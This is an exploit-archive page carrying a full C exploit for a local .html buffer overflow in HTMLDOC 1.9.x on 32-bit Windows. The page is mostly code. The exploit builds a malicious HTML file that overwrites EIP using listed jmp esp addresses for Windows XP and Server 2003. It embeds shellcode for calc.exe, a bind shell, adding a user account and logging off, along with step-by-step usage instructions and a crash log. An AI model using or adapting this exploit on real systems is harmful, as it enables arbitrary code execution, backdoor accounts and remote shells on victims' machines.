what you don't know can hurt you

HTMLDOC .html Buffer Overflow

HTMLDOC .html Buffer Overflow
Posted Jan 11, 2010
Authored by fl0 fl0w

HTMLDOC version 1.9.x-r1629 local .html buffer overflow exploit for Win32.

tags | exploit, overflow, local
systems | windows
MD5 | 9baf734bdf96474f4f1ad797a4bd10b5

HTMLDOC .html Buffer Overflow

Change Mirror Download
/*HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit 
download: http://www.htmldoc.org/software.php?VERSION=1.9.x-r1629&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1629.tar.bz2
[header] 19 bytes [junk] 268 bytes [EIP register] 4 bytes [NOP SLEED] 15 bytes [calc.exe shellcode] 338 bytes
PLEASE READ:
1.Run the exploit and generate the .html file
2.After you install HTMLDOC and get a trial licence open it and click on ADD FILES
3.Select the generated file and then go to OUTPUT set the output path,and se the output format as you wish for example .PDF
4.Click GENERATE and calc.exe launches ,success!
This exploit is for windows 32 bits only!
NOTE: All return addresses are tested on my pc so they work,this is a .C program compiled with Devc++
Whell if u really want to know the bug:
-snipp--
void set_page_size(const char *size){.....
char units[255];
if (sscanf(size, "%fx%f%s", &width, &length, units) >= 2)...}
-snipp--
Usage: E:\work\htmlDoc bof 100% exploit\24>htmldoc.exe 0 1
-snipp--
0:001> g
(644.518): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=60000000 ebx=00000000 ecx=7fffffff edx=00036161 esi=004516e0 edi=0012f114
eip=41414141 esp=0012d994 ebp=58585858 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ??? <------ next instruction pointer controled
-snipp--
*/
#include<stdio.h>
#include<string.h>

#define HTMLFILE "htmlsploit.html"
#define is_bigendian() ((*(char*)&i)==0)
#define EIP_OFFSET 287
#define SHELL_OFFSET 307
char data[]=
"\x3C\x21\x2D\x2D\x20\x4D\x45\x44\x49\x41\x20\x53\x49\x5A\x45\x20\x31\x78\x31" //header 19 bytes
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" //junk to cause exeption
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x41\x41\x41\x41" //EIP offset 287 bytes overwriten with jmp esp instruction from kernel32.dll module windows xp sp2
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //NOP SLEED 16 bytes
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" //calc.exe shellcode 338 bytes
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63";
struct
{
char* shellname;
char* shelltype;
}shellc[]=
{
{
"calc.exe",
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" //calc.exe shellcode 338 bytes
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"
},
{
"bind shell",
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" //bind shell
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67"
"\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x77\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x5a\x49\x49\x6c\x72"
"\x4a\x48\x6b\x32\x6d\x48\x68\x4c\x39\x39\x6f\x39\x6f\x69\x6f\x43"
"\x50\x6e\x6b\x50\x6c\x66\x44\x41\x34\x4c\x4b\x73\x75\x47\x4c\x6c"
"\x4b\x43\x4c\x57\x75\x30\x78\x75\x51\x7a\x4f\x4c\x4b\x42\x6f\x34"
"\x58\x4e\x6b\x41\x4f\x37\x50\x46\x61\x7a\x4b\x42\x69\x4e\x6b\x46"
"\x54\x6c\x4b\x63\x31\x6a\x4e\x50\x31\x49\x50\x4c\x59\x6e\x4c\x6f"
"\x74\x49\x50\x32\x54\x74\x47\x6f\x31\x6b\x7a\x44\x4d\x46\x61\x6f"
"\x32\x4a\x4b\x4a\x54\x77\x4b\x31\x44\x51\x34\x55\x78\x31\x65\x4b"
"\x55\x6c\x4b\x33\x6f\x75\x74\x63\x31\x38\x6b\x35\x36\x4e\x6b\x44"
"\x4c\x70\x4b\x4e\x6b\x43\x6f\x55\x4c\x36\x61\x78\x6b\x36\x63\x66"
"\x4c\x4e\x6b\x6f\x79\x42\x4c\x31\x34\x57\x6c\x75\x31\x78\x43\x75"
"\x61\x39\x4b\x50\x64\x4c\x4b\x57\x33\x34\x70\x4c\x4b\x77\x30\x64"
"\x4c\x4c\x4b\x70\x70\x37\x6c\x4c\x6d\x6e\x6b\x61\x50\x74\x48\x31"
"\x4e\x30\x68\x6c\x4e\x62\x6e\x44\x4e\x78\x6c\x72\x70\x39\x6f\x79"
"\x46\x63\x56\x76\x33\x70\x66\x42\x48\x56\x53\x37\x42\x53\x58\x62"
"\x57\x41\x63\x54\x72\x63\x6f\x51\x44\x59\x6f\x5a\x70\x50\x68\x7a"
"\x6b\x6a\x4d\x4b\x4c\x47\x4b\x62\x70\x59\x6f\x6e\x36\x71\x4f\x6f"
"\x79\x4d\x35\x43\x56\x6b\x31\x4a\x4d\x33\x38\x34\x42\x31\x45\x52"
"\x4a\x55\x52\x79\x6f\x6e\x30\x73\x58\x6a\x79\x77\x79\x4c\x35\x4c"
"\x6d\x52\x77\x39\x6f\x69\x46\x72\x73\x71\x43\x61\x43\x41\x43\x30"
"\x53\x42\x63\x46\x33\x42\x63\x71\x43\x4b\x4f\x58\x50\x71\x76\x30"
"\x68\x32\x31\x71\x4c\x65\x36\x41\x43\x6b\x39\x58\x61\x6a\x35\x63"
"\x58\x59\x34\x76\x7a\x30\x70\x4b\x77\x61\x47\x49\x6f\x4a\x76\x71"
"\x7a\x42\x30\x53\x61\x41\x45\x6b\x4f\x5a\x70\x53\x58\x6e\x44\x6c"
"\x6d\x64\x6e\x6d\x39\x36\x37\x49\x6f\x4b\x66\x73\x63\x30\x55\x39"
"\x6f\x4e\x30\x52\x48\x4d\x35\x41\x59\x6f\x76\x32\x69\x70\x57\x49"
"\x6f\x4e\x36\x66\x30\x66\x34\x30\x54\x43\x65\x4b\x4f\x4a\x70\x4f"
"\x63\x63\x58\x39\x77\x50\x79\x68\x46\x64\x39\x36\x37\x39\x6f\x4e"
"\x36\x70\x55\x4b\x4f\x6e\x30\x63\x56\x31\x7a\x32\x44\x42\x46\x31"
"\x78\x33\x53\x72\x4d\x4d\x59\x78\x65\x50\x6a\x52\x70\x70\x59\x57"
"\x59\x38\x4c\x6b\x39\x5a\x47\x31\x7a\x72\x64\x4e\x69\x4b\x52\x70"
"\x31\x49\x50\x78\x73\x4e\x4a\x4b\x4e\x71\x52\x56\x4d\x6b\x4e\x72"
"\x62\x34\x6c\x4f\x63\x6e\x6d\x33\x4a\x77\x48\x4e\x4b\x6c\x6b\x4c"
"\x6b\x55\x38\x32\x52\x6b\x4e\x58\x33\x56\x76\x59\x6f\x70\x75\x43"
"\x74\x49\x6f\x7a\x76\x43\x6b\x36\x37\x70\x52\x36\x31\x31\x41\x31"
"\x41\x52\x4a\x54\x41\x70\x51\x51\x41\x50\x55\x63\x61\x6b\x4f\x58"
"\x50\x73\x58\x4c\x6d\x79\x49\x43\x35\x4a\x6e\x31\x43\x4b\x4f\x7a"
"\x76\x71\x7a\x59\x6f\x4b\x4f\x64\x77\x6b\x4f\x38\x50\x4c\x4b\x50"
"\x57\x79\x6c\x4c\x43\x5a\x64\x70\x64\x4b\x4f\x4e\x36\x33\x62\x79"
"\x6f\x6e\x30\x41\x78\x4c\x30\x6f\x7a\x43\x34\x51\x4f\x50\x53\x79"
"\x6f\x4a\x76\x4b\x4f\x4e\x30\x67"
},
{
"win32 adduser",
"\xfc\xbb\xfb\xe2\x33\x0b\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" //win32 adduser
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x07\x0a\x77\x0b\xf7\xcb\xf3"
"\x4e\xcb\x40\x7f\x54\x4b\x56\x6f\xdd\xe4\x40\xe4\xbd\xda\x71\x11"
"\x08\x91\x46\x6e\x8a\x4b\x97\xb0\x14\x3f\x5c\xf0\x53\x38\x9c\x3b"
"\x96\x47\xdc\x57\x5d\x7c\xb4\x83\x9a\xf7\xd1\x47\xfd\xd3\x18\xb3"
"\x64\x90\x17\x08\xe2\xf9\x3b\x8f\x1f\x8e\x58\x04\xde\x7b\xe9\x46"
"\xc5\x7f\x29\x47\xc5\x1b\x26\xe8\xf5\x66\xf8\x91\xf9\xe3\xb9\x6d"
"\x89\x83\x25\xc3\x06\x0b\x5e\xf0\x10\x40\xde\xb6\x23\x56\xdf\x3d"
"\x4b\x6a\x80\x70\x7a\xf2\x68\xfa\x7a\x71\x54\x87\x2a\x1d\xa5\xf2"
"\xcf\x82\x2d\x9b\x2e\xb6\xa0\xcc\x31\x21\xdf\x9f\xa9\x83\x45\x18"
"\x57\xfb\xaa\xbb\xb7\x95\xd1\x4f\x98\x1c\x69\xd5\xaa\xfe\xfa\x25"
"\x7b\x8a\x24\x31\x4b\x42\x51\x9d\x84\xe3\xdd\x99\xfa\xc5\xfb\x01"
"\x95\x6c\x70\x62\x05\x01\x1b\x03\xb9\xba\xa9\xac\x34\x34\x6e\x72"
"\xd3\xd9\x07\x1a\x72\x52\xac\x90\xe5\xe0\x23\x27\x95\x28\xcb\xf7"
"\x69\x5c\x13\xd7\xc8\xd8\x17\x27\xcb\xe0\x97\x27\xcb"
},
{
"log off",
"\xfc\xbb\x25\x48\xf4\xb3\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" //Log off
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xd9\xa0\xb0\xb3\x21\x31\xb2"
"\xf1\x1d\xba\xb8\xfc\x25\xbd\xaf\x74\x9a\xa5\xa4\xd4\x04\xd7\x51"
"\xa3\xcf\xe3\x2e\x35\x21\x3a\xf1\xaf\x11\xb9\x31\xbb\x6e\x03\x7b"
"\x49\x71\x41\x97\xa6\x4a\x11\x4c\x43\xd9\x7c\x07\x14\x05\x7e\xf3"
"\xcd\xce\x8c\x48\x99\x8f\x90\x4f\x76\xa4\xb5\xc4\x89\x51\x4c\x86"
"\xad\xa1\x8c\x06\x6e\xcd\x99\x29\x5e\x88\x5e\xd1\x92\x19\x1e\x2e"
"\x20\x6d\x83\x83\xbd\xe5\xb3\x30\xc8\x7e\x43\x76\xcb\x80\x44\xfc"
"\xa4\xbc\x1b\x33\xc3\xdc\xf5\xba\xd3\x9f\x3a\xc7\x73\xf7\x4a\xb2"
"\x70\x58\xc3\x5b\x86\xec\x1d\x0b\x88\x17\x52\xdb\x03\xa3\xf1\x74"
"\x9b\x25\xda\xa7\x0f\x99\x37\xcc\xef\xe9\x77\x2c\xf0\x09\x78\x2c"
"\xf0"
},
{
NULL,NULL
}
};

char banner[]=
{
"**************************************************************\n"
"HTMLDOC 1.8.27.1 local .html buffer overflow(win32) exploit *\n"
" by fl0 fl0w *\n"
"Usage: htmldoc.exe 0 3 *\n"
" argv[1]=shellcode; argv[2]=retaddress *\n"
"**************************************************************\n"
};
//"\x7B\x46\x86\x7C" //Microsoft Windows Xp Pro sp3 JMP ESP Kernel32.dll 0x7C86467B
/*-------target structure-------------*/
struct
{
unsigned int eip;
char *windows;}target[]=
{ //jmp esp addr
{
0x7C874413,"Windows xp sp3"
}, //jmp esp module kernel32.dll
{
0x7C82385D,"Windows xp sp2"
}, //jmp esp module kernel32.dll
{
0x77D20738,"Windows server 2003 corporate sp0"
}, //jmp esp module user32.dll
{
0x77BCF856,"Windows server 2003 Enterprise sp0"
},//call esp from msvcrt.dll
{
0xdeadc0de,"Test b0f in debugger(results in a crash)"
},
{
NULL
}
};
/*--------prototypes-----------------*/
int cpy(char*,char*);
void print(char*);
int printTargets();
int fileBuild(char*,char*);
int printShell();
int reverseInt(unsigned int);
/*----extern variables--------------*/
char buffer[100000];
char fbuffer[100000];
int i;
//unsigned int T;
int S;
int j;
int T;
/*--------main---------*/
int main(int argc,char* argv[])
{
system("CLS");

cpy(banner,buffer);
printf("%s",buffer);

print("Starting exploit...");

printShell();
printTargets();

if (argc < 2)
{
print("Too few args");
exit(0);
}
memcpy(fbuffer, data, strlen(data));
j=atoi(argv[1]);

switch(j)
{
case 0:
memcpy(fbuffer+SHELL_OFFSET,shellc[0].shelltype,sizeof(shellc[0].shelltype));
break;
case 1:
memcpy(fbuffer+SHELL_OFFSET,shellc[1].shelltype,sizeof(shellc[1].shelltype));
break;
case 2:
memcpy(fbuffer+SHELL_OFFSET,shellc[2].shelltype,sizeof(shellc[2].shelltype));
break;
case 3:
memcpy(fbuffer+SHELL_OFFSET,shellc[3].shelltype,sizeof(shellc[3].shelltype));
memset(fbuffer+SHELL_OFFSET+strlen(shellc[3].shelltype),0x90,161);
break;
default: exit(0);
}

T=atoi(argv[2]);

if (T==0)
{
reverseInt(target[T].eip);
memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);}
else
if (T==1)
{
reverseInt(target[T].eip);
memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
}
else
if (T==2)
{
reverseInt(target[T].eip);
memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
}
else
if (T==3)
{
reverseInt(target[T].eip);
memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
}
else
if (T==4)
{
reverseInt(target[T].eip);
memcpy(fbuffer+EIP_OFFSET,&target[T].eip,4);
}

fileBuild(HTMLFILE,fbuffer);
printf("You are using the %s ret address\n",target[T].windows);
printf("You are using the %s shellcode\n",shellc[j].shellname);
print("Building file");
print("DONE! file is build");

getchar();
return 0;
}
int fileBuild(char* fname,char* b)
{
FILE *f=fopen(fname,"wb");

if (f==NULL)
{
print("File error\n");
return 0;
}

fprintf(f,"%s",b);

fclose(f);
free(b);

return 0;
}
int printShell()
{
print("These are the available shellcodes");

for (S=0;S<4;S++)
{
printf("[^]%s %d\n",shellc[S].shellname,S);
}
print("The default will remain calc.exe");
}
int cpy(char* source,char* dest)
{
int len;
len=strlen(source);
memcpy(dest,source,len+1);
return len;
}

void print(char* msg)
{
printf("\n[*]%s\n",msg);
}

int printTargets()
{
print("Chose your target:");

for (i=0;i<target[i].eip;i++)
printf("[+]%s - 0x%x press %d\n",target[i].windows,target[i].eip,i);
}

/*-----handle endianness---------------*/
int reverseInt(unsigned int i)
{
unsigned char c1, c2, c3, c4;

if (is_bigendian())
{
return i;
}else{
c1=i&255;
c2=(i>>8)&255;
c3=(i>>16)&255;
c4=(i>>24)&255;
return ((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
}
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close